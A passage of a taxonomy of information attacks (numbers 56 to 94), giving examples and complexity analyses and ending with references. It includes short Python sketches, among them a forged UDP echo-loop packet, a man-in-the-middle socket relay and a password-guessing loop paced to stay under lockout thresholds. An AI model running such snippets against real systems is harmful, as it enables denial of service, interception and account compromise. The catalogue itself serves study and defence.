Attack 56: data aggregation. Legitimately accessible data is aggregated to derive unauthorized information. Examples include getting the total departmental salary figures just before and after a new employee is hired to derive the salary of the new hire (worked below), attending a wide range of unclassified but private meetings in a particular area in order to gain an overall picture of what work a group is doing, and tracking movements of many people from a particular organization and correlating that information with job titles and other events to derive intelligence indicators. Data aggregation can be quite complex both to perform and to protect against. Some work on protecting against these attacks has led to identifying NP-complete problems, while gathering information through this technique may involve solving a large number of equations in a large number of unknowns and is similar to integer programming problems in complexity.
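The salary example reduces to one subtraction, which is what makes aggregation attacks so hard to police: each query is individually legitimate. With hypothetical numbers:

    #!/usr/bin/env python3
    # Worked version of the salary-aggregation inference (toy numbers).

    total_before_hire = 1240000   # aggregate salary query, day before hire
    total_after_hire = 1325000    # same aggregate query, day after

    # Neither query alone reveals an individual salary; together they do.
    new_hire_salary = total_after_hire - total_before_hire
    print("inferred salary of the new hire:", new_hire_salary)   # 85000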

Attack 57: process bypassing. Bypassing a normal process in order to gain advantage. Examples include retail returns department employees entering false return data in order to generate refund checks, use of computer networks to generate additional checks after the legitimate checks have passed the last integrity checks, and altering pricing records to reflect false inventory levels to cover up thefts. This attack is often accomplished by a relatively unsophisticated attacker using only knowledge gained while on the job. The complexity of many such attacks is low; however, in the general case it may be quite difficult to assure that no such attacks exist without a particular level of collusion. No formal analysis has been published to date.

Attack 58: content-based attacks. The content sent to an interpretive mechanism causes that mechanism to act inappropriately. Examples include Web-based URLs that bypass firewalls by causing the browser within the firewall to launch attacks against other inside systems, macros written in spreadsheet or word processing languages that cause those programs to perform malicious acts, and compressed archives that contain files with name clashes causing key system files to be overwritten when the archive is decompressed. Many content-based attacks are quite simple or are easily derived from published information. They tend to be quick to operate and simple to program. More sophisticated attacks exploiting a content-based flaw may require far more attack prowess. No mathematical analysis has been published of this class of attacks to date.

Attack 59: backup theft, corruption, or destruction. Backups protected less comprehensively than on-line copies of information are attacked. Examples include the placement of magnetic devices in backup storage areas in order to erase or corrupt magnetic backups, the infection of backup media by computer viruses, and the theft of backup media being disposed of near the end of its life cycle. Except in cases where backup information is encrypted, backup attacks are straightforward and introduce little complexity. In the case of aging backup tapes, some signal processing capabilities may be required in order to reliably read sections of media, but this is not very complex or expensive.

Attack 60: restoration process corruption or misuse. The process used to restore information from backup tapes is corrupted or misused to the attacker's advantage. Examples include the creation of fake backups containing false information, alteration of tape head alignments so that restoration fails, and the use of privileged restoration programs to grant privilege by restoring protection settings or ownerships to the wrong information. Creating fake backups may be complicated by having to reproduce much of what is present on actual backups at the particular site, by having to create CRC codes for replaced components of a backup, and by having to recreate an overall CRC code for the entire backup when altering only one component. None of these operations are very complex, and all can be accomplished with near-linear time and space techniques.

Attack 61: hangup hooking. Activity termination protocols fail or are interrupted so that termination does not complete properly and the protocol is taken over by the attacker. Examples include modem hangup failures leaving logged-in terminal sessions open to abuse, interrupted telnet sessions taken over by attackers, preventing proper protocol completion as in the Internet SYN attacks so as to deny subsequent services, and refusing to completely disconnect from a call-back modem at the CO, causing the call-back mechanism to become ineffective. These classes of attacks are normally simple to carry out, with probabilistic effects depending on the environment.

Attack 62: call forwarding fakery. Call forwarding capabilities are abused. Examples include the use of computer-controlled call forwarding to forward calls from call-back modems so that attackers get the call-backs, forwarding calls to illegitimate locations so as to intercept communications and provide false or misleading information, and the use of programmable call forwarding to cause long distance calls to be billed to the forwarding party's account. This class of attacks is relatively simple to carry out but often requires a precondition of breaking into a system involved in the forwarding operation.

Attack 63: input overflow. Excessive input is used to overrun input buffers, thus overwriting program or data storage so as to grant the attacker undesired access. Examples include sendmail overflows resulting in unlimited system access for attackers over the Internet, Web server overflows granting Internet attackers unlimited access to Web servers, buffer over-runs in privileged programs allowing users to gain privilege, and excessive input used to over-run input buffers causing loss of critical data so as to deny services or disrupt operations. In the case of denial of service, these attacks are trivial to carry out with a high probability of success. If the attacker wishes to gain access for more specific results, it is usually necessary to identify characteristics of the system under attack and create a customized attack version for each victim configuration. This is not very complex, but it is time and resource consumptive.
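The mechanism behind these overflows can be modelled in a few lines. The sketch below is a toy memory model, not a working exploit: a fixed-size input buffer sits directly before a 'return address' field, and an unchecked copy of oversized input overwrites that field with an attacker-chosen value.

    #!/usr/bin/env python3
    # Toy model of an input overflow (illustration, not a real exploit).

    BUF_SIZE = 16
    memory = bytearray(24)                           # buffer + 8-byte field
    memory[16:24] = (0x1000).to_bytes(8, "little")   # legitimate address

    def unchecked_copy(data):
        # Like C's strcpy: no comparison against BUF_SIZE.
        memory[0:len(data)] = data

    attacker_input = b"A" * BUF_SIZE + (0xBAD).to_bytes(8, "little")
    unchecked_copy(attacker_input)

    stored = int.from_bytes(memory[16:24], "little")
    print("return field is now 0x%X" % stored)       # 0xBAD, attacker-chosen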

Attack 64: illegal value insertion. Values not permitted by the specification but allowed by the implementation are used to cause abnormal results. Examples include negative dates producing negative interest which accrues to the benefit of the attacker, cash withdrawal values which overflow signed integers in balance adjustment causing large withdrawals to appear as large deposits (worked below), and pointer values sent to system calls that point to areas outside of the authorized address space of the calling party. Most such attacks are easily carried out once discovered, but systematically discovering such attacks is, in general, similar in complexity to grey box testing until the first fault is found.
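The withdrawal-to-deposit example is ordinary two's-complement wraparound. A worked version, assuming a hypothetical balance routine that stores the amount in a 32-bit signed integer:

    #!/usr/bin/env python3
    # Worked version of the signed-integer withdrawal example (toy numbers).

    def to_int32(n):
        # Interpret n modulo 2**32 as a signed 32-bit integer.
        n &= 0xFFFFFFFF
        return n - 2**32 if n >= 2**31 else n

    balance = 1000
    withdrawal_request = 3000000000          # exceeds 2**31 - 1

    amount = to_int32(withdrawal_request)    # wraps to -1294967296
    balance -= amount                        # subtracting a negative adds
    print("stored amount:", amount)
    print("new balance:  ", balance)         # a large deposit, not a withdrawal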

Attack 65: residual data gathering. Data left as a result of incomplete or inadequate deletion is gathered. Examples include object reuse attacks like the DOS undelete command in insecure operating systems, electromagnetic analysis of deleted media to regain deleted bits, and electron microscopy techniques used to extract overwritten data. Residual data gathering in the case of simple undeletions or allocating large volumes of space and examining their content is straightforward. Looking for residual data on magnetic media using electromagnetic measurements and electron microscopy is somewhat more complex and requires statistical analysis and correlation of signals in a signal processing component. While this is not trivial, it is within the capability of most electrical engineers and electronics specialists.

Attack 66: privileged program misuse. Programs with privilege are misused so as to provide unauthorized privileged functions. Examples include the use of a backup restoration program by an operator to intentionally restore the wrong information, misuse of an automated script processing facility by forcing it to make illicit copies of legitimate records, and the use of configuration management tools to create vulnerabilities. Once a vulnerability has been identified, exploitation is straightforward. Systematically discovering such attacks is, in general, similar in complexity to grey box testing until the first fault is found.

Attack 67: error-induced misoperation. Errors caused by the attacker induce incorrect operations. Examples include the creation of a faulty network connection to deny network services, the intentional introduction of incorrect data resulting in incorrect output (i.e. garbage in, garbage out), and the use of a scratched and bent diskette in a disk drive to cause the drive to permanently fail. Many of these attacks appear to be trivial to accomplish.

Attack 68: audit suppression. Audit trails are prevented from operating properly. Examples include overloading audit mechanisms with irrelevant data so as to prevent proper recording of malicious behaviour, network packet corruption to prevent network-based audit trails from being properly recorded, and consuming some resource critical to the auditing process so as to prevent audit records from being generated or kept. This class of attacks has not been thoroughly analyzed from a mathematical standpoint, but it appears that in most systems, audit trail suppression is straightforward. It may be far more difficult to accomplish this in a system designed to provide a high assurance of audit completeness.

Attack 69: induced stress failures. Stresses induced on a system cause it to fail. Examples include paging monsters that result in excessive paging and reduced performance, process viruses that consume various system resources, and large numbers of network packets per unit time which tie up systems by forcing excessive high-priority network interrupt processing. Although some attacks of this sort appear to be available without substantial effort, in general, understanding the implications of stress on multi-processing systems is beyond the current theory. It appears from a cursory examination that this is at least as complex as the interrupt sequence problem, which appears to be factorial in the number of instructions in each of the simultaneous processes.

Attack 70: hardware/system failure and flaw exploitation. Known hardware or system flaws are exploited by the attacker. Examples include a hardware flaw permitting a power-down instruction to be executed by a non-privileged user, causing an operating system to use the results of a known calculation error in a particular microprocessor for a key decision, and sending a packet with a parameter that is improperly handled by a network component. Discovering hardware flaws is, in general, similar in complexity to discovering software flaws, which makes this problem at least NP-complete.

Attack 71: false updates. Causing illegitimate updates to be made. Examples include sending a forged update disk containing attack code to a victim, interrupting the normal distribution channel and introducing an intentionally flawed distribution tape to be delivered, and substituting a false update disk for a real one at the vendor or customer site. This attack appears to be easily carried out against many installations, and examples have shown that even well-trained and adequately briefed employees fail to prevent such an attack. In cases where relatively secure distribution techniques are used, the complexity may be driven up, but more often than not, the addition of a disk will bypass even this sort of process.

Attack 72: network service and protocol attacks. Characteristics of network services are exploited by the attacker. Examples include the creation of infinite protocol loops which result in denial of services (e.g., echo packets under IP), the use of information packets under the Network News Transfer Protocol to map out a remote site, and use of the Source Quench protocol element to reduce traffic rates through select network paths. Analyzing protocol specifications to find candidate attacks appears to be straightforward, and implementing many of these attacks has proven within the ability of an average programmer. In general, this problem would appear to be as complex as analyzing protocols, which has been studied in depth and shown to be at least NP-complete for certain subclasses of protocol elements.
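
The infinite echo loop of the first example can be sketched as a single forged datagram (using the scapy packet library; the addresses are placeholders, raw packet injection requires administrative privilege, and modern systems disable the echo service for exactly this reason):

    from scapy.all import IP, UDP, send

    # One forged datagram whose source and destination are both UDP echo
    # (port 7) services: each host echoes the payload back to the other,
    # and the two services ping-pong the packet indefinitely.
    pkt = IP(src="10.0.0.1", dst="10.0.0.2") / UDP(sport=7, dport=7) / b"loop"
    send(pkt)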

Attack 73: distributed coordinated attacks. A set of attackers use a set of vulnerable intermediary systems to attack a set of victims. Examples include a Web-based attack causing thousands of browsers used by users at sites all around the world to attack a single victim site, a set of simultaneous attacks by a coordinated group of attackers trying to overwhelm defences, and an attack where thousands of intermediaries were fooled into trying to gain access to a victim site. Devising DCAs appears to be simple, while tracing a DCA to a source can be quite complex. Early results indicate that tracking a DCA to a source is exponential in the number of intermediaries involved, while detecting a high-volume DCA appears to be straightforward.

Attack 74: man-in-the-middle. The attacker positions forces between two communicating parties and both intercepts and relays information between the parties so that each believes they are talking directly to the other when, in fact, both are communicating through the attacker. Examples include attacks on public key cryptosystems permitting a man-in-the-middle to fool both parties, attacks wherein an attacker takes over an ongoing telecommunications session when one party decides to terminate it, and attacks wherein an attacker inserts transactions and prevents responses to those transactions from reaching the legitimate user. Man-in-the-middle attacks normally require the implementation of a near-real-time capability, but there are no mathematical impediments to most such attacks.
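A minimal sketch of the interception-and-relay mechanism in Python follows; the hosts and ports are placeholders, and a real attack must also defeat whatever authentication the parties use:

    import socket, threading

    # The attacker listens where the client expects the server and
    # forwards traffic both ways, observing (or altering) it in transit.
    LISTEN, UPSTREAM = ("0.0.0.0", 8443), ("server.example.com", 443)

    def pump(src, dst, label):
        while True:
            data = src.recv(4096)
            if not data:
                break
            print(label, len(data), "bytes")   # inspection/modification point
            dst.sendall(data)

    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(LISTEN)
    srv.listen(1)
    client, _ = srv.accept()
    upstream = socket.create_connection(UPSTREAM)
    threading.Thread(target=pump, args=(client, upstream, "c->s")).start()
    pump(upstream, client, "s->c")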

Attack 75: selected plaintext. The attacker gets one of the parties to encrypt or sign one or more messages of the attacker's choosing, thus causing information about the victim's system to be revealed. Examples include causing a user of the RSA signature system to reveal their secret key through a series of signatures, the introduction of malicious commands into the data entry stream of a victim who is blindly following directions of a remote person claiming to be assisting them, and inducing a bank to make a series of attacker-specified transactions so as to cause cryptographic protocols, methods, or keys to be revealed. Selected plaintext attacks have differing complexity depending on the system under attack. Attacks on RSA systems have been shown to be linear in time and polynomial in space.
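
The danger of signing attacker-chosen values can be illustrated with the multiplicative property of raw (unpadded) RSA signatures; the toy parameters below (p = 61, q = 53) are for illustration only:

    # Toy RSA parameters: n = 61*53 = 3233, e = 17, d = 2753.
    n, e, d = 3233, 17, 2753

    def sign(m):
        return pow(m, d, n)              # raw (unpadded) RSA signature

    m1, m2 = 42, 55                      # attacker-chosen messages
    s1, s2 = sign(m1), sign(m2)          # the victim obligingly signs both
    forged = (s1 * s2) % n               # a valid signature on m1*m2 mod n
    assert forged == sign((m1 * m2) % n) # a message the victim never saw

Hashing and padding before signing exist precisely to destroy this multiplicative structure.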

Attack 76: replay attacks. Communicated information is replayed and causes unanticipated side effects. Examples include the replay of encrypted funds transfer transmissions so as to cause multiples of an original sum of money to be transferred, replay of coded messages causing the repeated movement of troops, replay of transaction sequences that simulate behaviour so as to cover up actual behaviour, and the delayed replay of events such as races so as to deceive a victim. Replay attacks are typically simple to perform and require little or no sophistication. In some cases, relatively complex coding may be required in order to reproduce CRC codes or checksums, but this is normally not required for replay attacks.
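
The following sketch illustrates why replay is so simple: a message authentication code proves integrity and origin but says nothing about freshness, so a recorded message verifies just as well the second time (the key and message are placeholders):

    import hmac, hashlib

    key = b"shared-secret"                        # placeholder key
    msg = b"TRANSFER 500 FROM alice TO mallory"
    tag = hmac.new(key, msg, hashlib.sha256).digest()

    def accept(message, mac):
        expected = hmac.new(key, message, hashlib.sha256).digest()
        return hmac.compare_digest(expected, mac)

    assert accept(msg, tag)    # the original transfer is accepted
    assert accept(msg, tag)    # an exact replay is accepted just as readily

Sequence numbers, timestamps, or challenge nonces are the usual countermeasures.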

Attack 77: cryptanalysis. Cryptographic techniques are analyzed so as to find methods to break codes used to secure information. Examples include frequency analysis for breaking monoalphabetic substitution ciphers, index of coincidence analysis for breaking polyalphabetic substitution ciphers, the breaking of the Enigma cipher in World War II through mathematical and optical techniques combined with knowledge of keys and key usage, exhaustive attacks on the DES encryption standard, code-listeners for breaking many analogue speech encoding systems, and improved factoring for breaking cryptosystems based on modular arithmetic. Cryptanalysis is a widely studied mathematical area and typically involves a great deal of expertise and computing power against modern cryptographic systems. Cryptanalysis of improperly designed systems and of systems invented before the 1940s is almost universally accomplished by relatively simple automation.
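
As an illustration of the simplest case, the sketch below breaks a Caesar shift (a degenerate monoalphabetic substitution) by scoring each candidate shift against typical English letter frequencies; the frequency table is approximate:

    from string import ascii_lowercase as ABC

    # Approximate English letter frequencies (the top letters suffice here).
    FREQ = {'e': .127, 't': .091, 'a': .082, 'o': .075, 'i': .070,
            'n': .067, 's': .063, 'h': .061, 'r': .060, 'd': .043, 'l': .040}

    def shift_back(text, k):
        return "".join(ABC[(ABC.index(c) - k) % 26] for c in text if c in ABC)

    def crack(ciphertext):
        # The shift whose decryption looks most like English wins.
        return max(range(26), key=lambda k: sum(FREQ.get(c, 0)
                                                for c in shift_back(ciphertext, k)))

    ct = "wkh vhfuhw phhwlqj lv dw qrrq"   # "the secret meeting is at noon", k=3
    print("recovered shift:", crack(ct))   # 3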

Attack 78: breaking key management systems. Keys in cryptographic systems are managed by imperfect management systems that are attacked in order to gain access to keying materials. Examples include attacks based on inadequate randomness in key generation techniques, exploitation of selected plaintext attacks against inadequately implemented automated encryption systems, and breaking into computers housing keying materials. Many key management attacks require a substantial amount of computing power, but this is normally on the order of only a few million computations to break a key that could not be broken exhaustively under any feasible scheme. The complexity of these attacks tends to be specific to the particular key management system. In many cases, the weakest link is the computer housing the keys, and this is often attacked in a relatively small amount of time through other techniques.

Attack 79: covert channels. Channels not normally intended for information flow are used to flow information. Examples include widely known covert channels in secure operating systems, time-based covert channel exploitation in encryption engines, and covert channels created by the association of movements of people with activities. It has been shown that in any system using shared resources in a non-fixed fashion, covert channels exist. They are typically easy to exploit, using Shannon's communications theory to provide an arbitrary reliability at a given bandwidth based on the channel bandwidth and signal-to-noise ratio of the covert channel. Avoiding detection depends primarily on remaining below the detection threshold used by techniques that try to detect covert channel activity.
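A minimal sketch of a timing covert channel between two colluding processes follows; the delays and threshold are arbitrary assumptions, and real channels hide in I/O, paging, or network timing rather than explicit sleeps:

    import time

    SHORT, LONG, THRESHOLD = 0.05, 0.20, 0.125   # assumed delays (seconds)

    def send_bits(bits):
        # Sender: modulate the gap between observable events.
        stamps = [time.monotonic()]
        for b in bits:
            time.sleep(LONG if b else SHORT)
            stamps.append(time.monotonic())
        return stamps

    def receive(stamps):
        # Receiver: threshold the inter-event gaps to recover the bits.
        return [1 if later - earlier > THRESHOLD else 0
                for earlier, later in zip(stamps, stamps[1:])]

    message = [1, 0, 1, 1, 0]
    assert receive(send_bits(message)) == message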

Attack 80: error insertion and analysis. Errors are induced into systems to reveal values stored in those systems. Examples include recent demonstrations of methods for inducing errors so as to reveal keys stored in smart-cards and other similar key-transportation devices, the introduction of multiple errors into redundant systems so as to cause the redundancy to fail, and the introduction of errors designed to cause systems to no longer be used in critical applications. The complexity of error insertion is not known; however, many researchers have recently claimed to have produced efficient and reliable insertion techniques. The mathematics in this area is quite new and definitive results are still pending.

Attack 81: reflexive control. Reflexive reactions are exploited by the attacker to induce desired behaviours. Examples include the creation of attacks that appear to come from a friend so as to cause automated response systems to shut down friendly communication, induction of select flaws into the power grid so as to cause SCADA systems to reroute power to the financial advantage of select suppliers, and the use of forged or interrupted signals so as to cause friendly fire incidents. The concept of reflexive control is easily understood, and for simplistic automated response systems, finding exploitations appears to be quite simple, but there has been little mathematical work in this area (other than general work in control theory) and it is premature to assess a complexity level at this time. In general, it appears that this problem may be related to the problems in producing and analyzing cascade failures, in that causing a desired reflexive reaction with a reasonable degree of control may be quite complex.

Attack 82: dependency analysis and exploitation. Interdependencies of systems and components are analyzed so as to determine indirect effects and to attack weak points upon which strong points depend. Examples include attacking medical information systems in order to disrupt armed forces deployments, attacking the supply chain in order to corrupt information within an organization, and attacking power grid elements in order to disrupt financial systems. The analysis of dependencies appears to require substantial detailed knowledge of an operation or similar operations. Finding common critical dependencies appears to be straightforward, but producing desired and controllable effects may be more complex. Mathematical analysis of this issue has not been published to date. Common mode faults and systemic flaws are of particular utility in this sort of attack.
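Finding common critical dependencies can indeed be sketched as a simple graph computation; the dependency graph below is entirely hypothetical:

    # Given a dependency graph, compute what each critical service
    # transitively depends on, then intersect to find common weak points.
    DEPENDS = {
        "funds-transfer": ["billing-db", "auth"],
        "deployment-orders": ["medical-db", "auth"],
        "billing-db": ["power-grid"],
        "medical-db": ["power-grid"],
        "auth": ["power-grid"],
    }

    def closure(node, graph):
        seen, stack = set(), [node]
        while stack:
            for dep in graph.get(stack.pop(), []):
                if dep not in seen:
                    seen.add(dep)
                    stack.append(dep)
        return seen

    critical = ["funds-transfer", "deployment-orders"]
    common = set.intersection(*(closure(c, DEPENDS) for c in critical))
    print("shared dependencies:", common)   # {'auth', 'power-grid'}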

Attack 83: interprocess communication attacks. Interprocess communications channels are attacked in order to subvert normal functioning. Examples include the introduction of false interprocess signals in a network interprocess communications protocol causing misbehaviour of trusted programs, the disruption of interprocess communications by resource exhaustion so as to prevent proper checking or to reduce or eliminate functionality, and observation of interprocess communications stored in shared temporary data files so as to gain unauthorized information. Interprocess communication attacks oriented toward disruption appear to be easily accomplished, but no mathematical analysis of this class of attacks has been published to date.

Attack 84: below-threshold attacks. Attack detection based on thresholds of activity that differentiate between attacks and similar non-malicious behaviours is exploited by launching attacks that operate below the detection threshold. Examples include breadth-first password guessing attacks, breadth-first port scanning attacks, and low-bandwidth covert channel exploitations. Remaining below detection thresholds is straightforward if the thresholds are known and impossible to guarantee if they are unknown. In most cases, estimates based on comparable policies or widely published standards are adequate to accomplish below-threshold attacks.
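
A sketch of the breadth-first password guessing example follows; the account list, guess list, threshold, and try_login stub are all assumptions about a hypothetical target:

    import time

    ACCOUNTS = ["alice", "bob", "carol", "dave"]          # hypothetical targets
    GUESSES = ["123456", "password", "letmein", "qwerty"]
    THRESHOLD, WINDOW = 5, 3600.0    # assumed lockout: 5 failures/hour/account

    def try_login(user, password):
        # Placeholder for an attempt against the real target system.
        return False

    for password in GUESSES:
        for user in ACCOUNTS:        # breadth-first: one guess across all accounts
            if try_login(user, password):
                print("hit:", user, password)
        # Pace so each account sees well under THRESHOLD failures per WINDOW.
        time.sleep(WINDOW / THRESHOLD)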

Attack 85: peer relationship exploitation. The transitive trust relationships created by peer networking are exploited so as to expand privileges to the transitive closure of peer trust. Examples include the activities carried out by the Morris Internet virus in 1988, the exploitation of remote hosts (.rhosts) files in many networks, and the exploitation of remote software distribution channels as a channel for attack. Exploiting peer relationships appears to be easily accomplished, requiring only a cursory examination of history for a set of candidate peers and trial and error for exploitation.
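
The transitive closure of peer trust can be computed in a few lines; the .rhosts-style trust graph below is hypothetical:

    TRUSTS = {                 # host -> hosts it accepts logins from
        "db1": {"web1"},
        "backup": {"db1"},
        "hr": {"backup", "db1"},
    }

    def reachable_from(start, trusts):
        # Which hosts can 'start' log in to, directly or transitively?
        owned, changed = {start}, True
        while changed:
            changed = False
            for host, peers in trusts.items():
                if host not in owned and peers & owned:
                    owned.add(host)
                    changed = True
        return owned

    print(reachable_from("web1", TRUSTS))  # {'web1', 'db1', 'backup', 'hr'}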

Attack 86: inappropriate defaults. Unchanged default values set into systems at the factory or in a standard distribution process are known to and exploited by attackers to gain unauthorized access. Examples include default passwords, default accounts, and default protection settings. It may be quite difficult to create a comprehensive list of appropriate defaults for any non-trivial system because the optimal settings are determined by the application. No substantial mathematics has been done on analyzing the complexity of finding proper settings, but many lists of improper defaults published for select operating systems appear to require only time and space linear in the number of files in a system in order to verify and correct mis-settings.
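
The linear-time verification claim can be illustrated by a single-pass audit; the sketch below walks a file tree once and flags one common mis-setting (world-writable permission bits), with the root path as a placeholder:

    import os, stat

    def audit(root="/etc"):
        findings = []
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    mode = os.stat(path).st_mode
                except OSError:
                    continue
                if mode & stat.S_IWOTH:          # writable by everyone
                    findings.append(path)
        return findings

    for path in audit():
        print("world-writable:", path)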

Attack 87: piggybacking. Exploiting a (usually false) association to gain advantage. Examples include walking into a secure facility with a group of other people as one of the crowd, acting like an ex-policeman to gain intelligence about ongoing police activities, and adding a floppy disk to a series of floppy disks delivered as part of a normal update process. No published measures of complexity for piggybacking attacks have been made to date; however, certain types of these attacks appear to be trivially carried out.

Attack 88: collaborative misuse. Collaboration of several parties or identities in order to misuse a system. Examples include creation of a false identity by one party and entry of that identity into a computer database by a second party, provision of attack software by an outsider to an insider who is participating in an information theft, partitioning of elements of an attack into multiple parts for coordinated execution so as to conceal the fact of or source of an attack, and the providing of alibis by one party to another when they collaborated in a crime. Collaborative misuse has not been extensively analyzed mathematically, but limited analysis has been done from the standpoint of identifying the effects of collaborations on leakage and corruption in POSet networks, and results indicate that detecting or limiting collaborative effects is not highly complex if the individual attacks are detectable.

Attack 89: race conditions. Interdependent sequences of events are interrupted by other sequences of events that destroy critical dependencies. Examples include the change of conditions tested in one step and depended upon for the next step (e.g. checking for the existence of a file before creating it, interrupted by the creation of a file of the same name by another owner), changes between one step in a process and another step that assumes no such change has been made (e.g. the replacement of a mounted file system previously loaded with data in a start-up process), and waiting for non-locked resources available in one step but not in the next (e.g. the mounting of a different tape between an initial read-through and a subsequent restoration). Race conditions are not easy to detect. In general, detecting them requires at least NP-complete time and space and may require factorial time in some cases. Some automated analysis tools have been implemented to detect certain classes of race conditions in source code and have shown promise.
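The first example is the classic check-then-act race; the sketch below (the path is a placeholder) shows both the racy sequence and an atomic alternative that closes the window:

    import os

    path = "/tmp/report.txt"

    # Racy: the world can change between the check and the open, so the
    # attacker can plant a file (or symlink) at the path in between.
    if not os.path.exists(path):
        with open(path, "w") as f:       # may now open the attacker's file
            f.write("secret draft")

    # Atomic alternative: O_CREAT|O_EXCL makes the check and the creation
    # one operation, failing instead of following a planted file.
    fd = os.open(path + ".safe", os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write("secret draft")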

Attack 90: strategic or tactical deceptions. Deceptions are generally categorized as comprising concealment, camouflage, false and planted information, ruses, displays, demonstrations, feints, lies, and insight (as described in Dunnigan, 1995). Examples include the creation of a questionnaire asking for detailed information security backgrounds under the auspices of a possible contract, used to determine what expertise is available at a particular company to defend against a particular type of attack (a ruse); the creation of a false front organization such as a garbage collection business in order to gain access to valuable information often placed in the trash (camouflage); and the claim of having special capabilities in your upcoming product in order to force other vendors to work in that area even though you never intend to enter into it (a feint). In general, deceptions comprise a complex class of techniques, some subclasses of which are known to be undecidable to detect and trivial to create, and other subclasses of which have not been analyzed.

Attack 91: combinations and sequences. Many attacks combine several techniques synergistically in order to effect their goal. Examples include exploiting an emergency response to a flood to gain entry into a terminal room, where password guessing gains entry into a system and subsequent data diddling alters billing records; the use of a virus to create protection mis-settings which are subsequently exploited by planting a Trojan horse to allow re-entry, and the creation of fictitious people in key offices who are automatically granted access to appropriate systems (process bypassing) to allow the attacker access to other systems; and the creation of an attractive Web site designed to exploit users who visit it by sending their browsers content-based attacks that set up covert channels through firewalls and extend access through peer network relationships to other systems within the victim's network. Combinations and sequences of attacks are at least as complex as their individual components, and may be more complex to create in coordination. Detection may be less complex because detection of any subset or subsequence may be adequate to detect the combined attack. This has not been studied in any mathematical depth to date.

Attack 92: kiting. Inherent delays are exploited by creating a ring of events that chase each others' tails, thus creating the dynamic illusion that things are different from what the static case would support. Examples include check kiting schemes, where delays in processing checks cause temporary conditions in which the sum of the balances indicated in a set of accounts is far greater than the total amount of money actually invested; techniques for avoiding payment of debts for a long time based on legally imposed delays in, and rules regarding, the collection of debts by third parties; and the use of revoked keys in key management systems without adequate revocation protocols. The complexity of kiting schemes has not been mathematically analyzed in published literature to date, but indications from actual cases are that substantial computing power is required to track substantial kiting schemes. The first case where such a scheme was detected and prosecuted was detected because the kiter's computer failed for a long enough period of time that the set of transactions and delays could no longer be tracked - the kite fell out of the sky.
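
A toy model of the check kiting example (the clearing delay, amounts, and schedule are invented) shows how circulating cheques inflate the apparent total:

    from collections import deque

    CLEARING_DELAY = 3                 # days for a cheque to clear (assumed)
    balances = {"A": 100, "B": 100}    # real money in the system: 200
    in_transit = deque()               # (day_due, payer, amount)

    for day in range(10):
        # Debits finally land once the clearing delay expires.
        while in_transit and in_transit[0][0] <= day:
            _, payer, amount = in_transit.popleft()
            balances[payer] -= amount
        # Kite a cheque in alternating directions: credited immediately,
        # debited only CLEARING_DELAY days later.
        payer, payee = ("A", "B") if day % 2 == 0 else ("B", "A")
        balances[payee] += 500
        in_transit.append((day + CLEARING_DELAY, payer, 500))
        print(day, balances, "apparent total:", sum(balances.values()))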

Attack 93: salami attacks. Many small transactions are used together for a larger aggregated effect. Examples include taking round-off error amounts from financial interest computations and adding them to the thief's account balance (resulting in no net loss to the system), the slow leakage of information through covert channels at rates below normal detection thresholds, and economic intelligence gathering efforts involving the aggregation of small amounts of information from many sources to derive an overall picture of an organization. Attacks of this sort are relatively easy to create. Mathematical analysis of the general class of salami attacks has not been done, but it seems likely to be similar in complexity to the analysis of data aggregation effects.
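
The round-off example can be sketched directly (all figures are invented; exact decimal arithmetic is used so the shaved fractions remain visible):

    from decimal import Decimal, ROUND_DOWN

    RATE = Decimal("0.0525") / 365                 # assumed daily interest rate
    accounts = {f"acct{i}": Decimal("1000.00") + i for i in range(1000)}
    skim = Decimal("0")

    for name, balance in accounts.items():
        interest = balance * RATE                  # computed to full precision
        credited = interest.quantize(Decimal("0.01"), rounding=ROUND_DOWN)
        accounts[name] = balance + credited        # customer gets whole cents
        skim += interest - credited                # the thief keeps the slice

    print("one day's shavings:", skim)   # tiny per account, large in aggregate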

Attack 94: repudiation. A transaction or other operation is repudiated by the party recorded as initiating it. Examples include repudiating a stock trade, claiming your account was broken into and that you didn't do it, and asserting that an electronic funds transfer was not done. Repudiation has been addressed with cryptographic techniques, but for the most part, these techniques are easily broken - in the sense that a person wishing to repudiate a future transaction can always act to make repudiation supportable. In stock trades, this problem has been around for a long time and is primarily addressed by recording all telephone calls (which form the basis for each transaction) and using the recorded message to resolve the issue when a disagreement is identified.

Summary

It is hoped that this list will be a starting point and not an ending point. If all goes well and many of the readers comment on this listing, efforts will be made to improve and expand upon the list in the future and to relate our results to the readership again at a later date.

References

Agudo, 1996. Assessment of Electric Power Control Systems Security, Joint Program Office for Special Technology Countermeasures, September 30, 1996.

Bell, D.E. and LaPadula, L.J., 1973. Secure Computer Systems: Mathematical Foundations and Model, The Mitre Corporation, 1973.

Bellovin, S.M., 1989. Security Problems in the TCP/IP Protocol Suite, ACM SIGCOMM Computer Communications Review, April 1989, pp. 32-48.

Bellovin, S.M., 1992. There Be Dragons, Proceedings of the Third Usenix UNIX Security Symposium, Baltimore, September 1992.

Biba, K.J., 1977. Integrity Considerations for Secure Computer Systems, USAF Electronic Systems Division, 1977.

Bishop, M. and Dilger, M., 1996. Checking for Race Conditions in File Access.

Bochmann, G.V. and Gecsei, J., 1977. A Unified Method for the Specification and Verification of Protocols, IFIP Congress, Toronto, 1977, pp. 229-234.

Cheswick, W. and Bellovin, S.M., 1994. Firewalls and Internet Security - Repelling the Wily Hacker, Addison-Wesley, 1994.

Cohen, F., 1984. Computer Viruses - Theory and Experiments, IFIP TC-11 Conference, Toronto, 1984.

Cohen, F., 1985. Algorithmic Authentication of Identification, Information Age, Vol. 7, No. 1, January 1985, pp. 35-41.

Cohen, F., 1985b. A Secure Computer Network Design, IFIP-TC11, Computers & Security, Vol. 4, No. 3, 1985, pp. 189-205.

Cohen, F., 1986. Computer Viruses, ASP Press, 1986.

Denning, D.E., 1975. Secure Information Flow in Computer Systems, Ph.D. dissertation, Purdue University, West Lafayette, Indiana, USA, 1975.

Denning, D.E., 1976. A Lattice Model of Secure Information Flow, Communications of the ACM, Vol. 19, No. 5, 1976, pp. 236-243.

Denning, D.E., 1982. Cryptography and Data Security, Addison-Wesley, Reading, Massachusetts, USA, 1982.

Cohen, F., 1987. Protection and Administration of Information Networks under Partial Orderings, IFIP-TC11, Computers & Security, Vol. 6, 1987, pp. 118-128.

Cohen, F., 1987b. Introductory Information Protection, ASP Press, 1987.

